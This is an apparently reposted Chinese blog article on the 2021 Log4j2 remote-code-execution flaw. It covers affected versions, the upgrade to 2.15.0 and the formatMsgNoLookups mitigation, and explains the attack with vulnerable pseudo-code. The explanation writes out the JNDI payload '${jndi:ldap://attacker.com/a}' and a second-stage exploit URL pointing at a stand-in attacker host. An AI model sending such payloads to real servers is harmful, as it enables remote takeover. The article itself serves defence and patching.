IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Java知识库 -> 影响太大了,连不懂代码的客户都来问Log4j2的0day漏洞 -> 正文阅读

[Java知识库]影响太大了,连不懂代码的客户都来问Log4j2的0day漏洞

今天早上醒来,知名的Java日志组件Apache Log4j2就刷爆了圈子。它被发现了一个 0 Day 漏洞,该Log4J2 漏洞可以让黑客通过日志记录远程执行代码(Remote Code Execution)。由于这个日志库被普遍使用,而这个漏洞又非常容易使用,所以造成的风险也非常严重,让人不得不提高防范。就连不懂代码的客户都来问系统是否存在这个问题。

受影响的版本

受本次漏洞影响的版本范围为Apache log4j2 2.0 - 2.14.1

安全版本

正式补丁版本2.15.0已发布,请立即升级。

?<dependencies>
? ?<dependency>
? ? ?<groupId>org.apache.logging.log4j</groupId>
? ? ?<artifactId>log4j-api</artifactId>
? ? ?<version>2.15.0</version>
? ?</dependency>
? ?<dependency>
? ? ?<groupId>org.apache.logging.log4j</groupId>
? ? ?<artifactId>log4j-core</artifactId>
? ? ?<version>2.15.0</version>
? ?</dependency>
?</dependencies>
复制代码

临时补救措施

不是所有的应用和使用者都能及时升级到安全版本。目前也有临时的补救措施。

  • 修改JVM参数,设置 -Dlog4j2.formatMsgNoLookups=true
  • 在涉及漏洞的项目的类路径(classpath)下增加log4j2.component.properties配置文件并增加配置项log4j2.formatMsgNoLookups=true

攻击原理

?import org.apache.log4j.Logger;
??
?import java.io.*;
?import java.sql.SQLException;
?import java.util.*;
??
?public class VulnerableLog4jExampleHandler implements HttpHandler {
??
? ?static Logger log = Logger.getLogger(log4jExample.class.getName());
??
? ?/**
? ? * A simple HTTP endpoint that reads the request's User Agent and logs it back.
? ? * This is basically pseudo-code to explain the vulnerability, and not a full example.
? ? * @param he HTTP Request Object
? ? */
? ?public void handle(HttpExchange he) throws IOException {
? ? ?string userAgent = he.getRequestHeader("user-agent");
? ? ?
? ? ?// This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
? ? ?// The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
? ? ?log.info("Request User Agent:" + userAgent);
??
? ? ?String response = "<h1>Hello There, " + userAgent + "!</h1>";
? ? ?he.sendResponseHeaders(200, response.length());
? ? ?OutputStream os = he.getResponseBody();
? ? ?os.write(response.getBytes());
? ? ?os.close();
?  }
?}
复制代码

根据上面提供的攻击代码,攻击者可以通过JNDI来执行LDAP协议来注入一些非法的可执行代码。

攻击步骤

  • 攻击者向漏洞服务器发起攻击请求。
  • 服务器通过Log4j2记录攻击请求中包含的基于JNDILDAP的恶意负载${jndi:ldap://attacker.com/a}attacker.com是攻击者控制的地址。
  • 记录的恶意负载被触发,服务器通过JNDIattacker.com请求。
  • attacker.com就可以在响应中添加一些恶意的可执行脚本,注入到服务器进程中,例如可执行的字节码http://second-stage.attacker.com/Exploit.class
  • 攻击者执行恶意脚本。

漏洞执行测试

不要小看这个漏洞

因为log4j的使用范围太广了,很多应用都中招了。

连Minecraft 游戏的PaperMC服务器都未能幸免。所以赶紧排查打补丁吧。

Minecraft PaperMC


作者:码农小胖哥
链接:https://juejin.cn/post/7040098410644373534
来源:稀土掘金
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

  Java知识库 最新文章
计算距离春节还有多长时间
系统开发系列 之WebService(spring框架+ma
springBoot+Cache(自定义有效时间配置)
SpringBoot整合mybatis实现增删改查、分页查
spring教程
SpringBoot+Vue实现美食交流网站的设计与实
虚拟机内存结构以及虚拟机中销毁和新建对象
SpringMVC---原理
小李同学: Java如何按多个字段分组
打印票据--java
上一篇文章      下一篇文章      查看所有文章
加:2021-12-14 15:48:10  更:2021-12-14 15:48:12 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 5:59:44-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码